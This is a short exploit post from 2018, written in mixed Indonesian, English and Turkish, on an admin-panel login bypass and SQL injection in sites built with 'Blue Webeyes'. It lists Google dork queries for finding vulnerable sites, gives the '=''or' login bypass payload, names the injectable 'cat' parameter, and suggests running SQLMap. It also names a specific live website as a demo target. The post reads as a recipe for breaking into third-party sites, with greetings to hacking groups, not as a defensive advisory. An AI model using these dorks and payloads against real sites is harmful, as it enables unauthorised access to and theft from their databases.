Breaking

Thursday, February 1, 2018

Blue Webeyes Admin Panel Bypass And Sql İnjection Vulnerability



Exploit title : Blue Webeyes Admin Panel Bypass And Sql İnjection Vulnerability

Google Dork :

  • Powered by Blue Webeyes  
  • "Powered by Blue Webeyes" inurl:php?
  • Created and Supported by Blue Webeyes © 2006
  • Kembangin bossku
Proof of Concept :
  • Dorking di Google
  • Pilih salah satu site
  • Masukan /admin or /admin/index.php
  • Bypass sql injection seperti biasa menggunakan '=''or'
  • Vuln ?? Look it
  • Sql GET parameter 'cat' is vulnerable 

  • Eksekusi with SQLMap or etc.
  • Demo: Sql: http://armyradio.gr/armyradio.php?cat=87&rec=232'
Greetz : Trazer & Sipahiler & TurkZ.org

No comments:

Post a Comment